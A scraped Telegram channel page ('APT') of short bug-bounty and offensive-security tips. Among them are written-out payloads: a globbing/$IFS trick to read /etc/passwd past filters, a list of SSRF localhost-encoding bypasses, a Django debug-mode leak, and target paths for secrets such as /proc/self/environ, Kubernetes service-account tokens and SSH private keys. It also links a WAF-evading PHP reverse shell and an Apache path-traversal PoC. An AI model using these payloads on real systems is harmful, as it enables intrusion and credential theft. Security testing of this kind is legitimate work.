APT
@APT_Notes
12.9K subscribers
550 photos
27 videos
24 files
890 links
This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.me/APT_Notes/6

Chat Link:
t.me/APT_Notes_PublicChat
Download Telegram
About
Blog
Apps
Platform
Join
APT
12.9K subscribers
APT
Cookie Based Auth Vulnerabilities

https://www.xmind.net/m/2FwJ7D/

#AppSec #hacking #bugbountytips #websecurity #xmind
Xmind
Cookie Based Authentication Vulnerabilities
A Mind Map about Cookie Based Authentication Vulnerabilities submitted by Harsh Bothra on Feb 9, 2021. Created with Xmind.
277 viewsPaul Shmidt
APT
Scope Based Recon

https://www.xmind.net/m/hKKexj/

#AppSec #hacking #bugbountytips #websecurity #xmind
289 viewsPaul Shmidt
APT
Search Subdomains using Jldc

curl -s "jldc.me/anubis/subdomains/example.com" | grep -Po '(?<=")[\w*.-]*(?=")'

#bugbounty #bugbountytips
244 viewsPaul Shmidt
APT
Search JS using Gau

gau -subs DOMAIN |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt

#bugbounty #bugbountytips
243 viewsPaul Shmidt
APT
image_2021-09-07_13-28-22.png
4.5 MB
Shodan Dorks

https://raw.githubusercontent.com/Dheerajmadhukar/karma_v2/main/img/shodan_osint_manual_recon.txt

#bugbounty #osint #recon #shodan #dorks #bugbountytips
🔥1
359 viewsedited  
APT
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)

https://twitter.com/ducnt_/status/1445386557574324234

#cve #apache
Twitter
Nguyen The Duc
Just got worked exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀
385 views
APT
LFI Bypass

1) /usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
2) /*/?at$IFS/???/???swd
3)/****/?at$IFS/???/*swd
4)/****/?at$IFS/???/*******swd

(IFS is Internal Field Separator = [space], [tab] or a [newline])

#bugbounty #bugbountytips #lfi
334 views
APT
Best SSRF bypass

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

#ssrf #bugbounty #bugbountytips
537 viewsedited  
APT
Django Debug Mode Bypass

https://target/login?next=/

https://target/admin
[301 to https://target/admin/login/?next=/admin/]

Change request to [POST]
[500 Django DEBUG mode and vary bad information]

#bugbounty #bugbountytips #bugbountytip
444 views
APT
Finding Sensitive Files for BugBounty

/proc/self/cwd/index.php
/proc/self/cwd/main.py
/etc/motd
/proc/net/udp
/proc/net/arp
/proc/self/environ
/var/run/secrets/kubernetes.io/serviceaccount
/proc/cmdline
/proc/mounts
/etc/motd
/etc/mysql/my.cnf
/proc/sched_debug
/home/ user/.bash_history
/home/user/.ssh/id_rsa

#sensitive #files #bugbounty #bugbountytips
👍1
1.16K viewsedited  
APT
Forwarded from Offensive Xwitter
😈 [ 0x0SojalSec, Md Ismail Šojal ]

The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
get more detail about this👇

🔗 https://gist.github.com/0xSojalSec/5bee09c7035985ddc13fddb16f191075

#bugbountyTips #bugbounty

🐥 [ tweet ]
5👍3👎1
1.84K views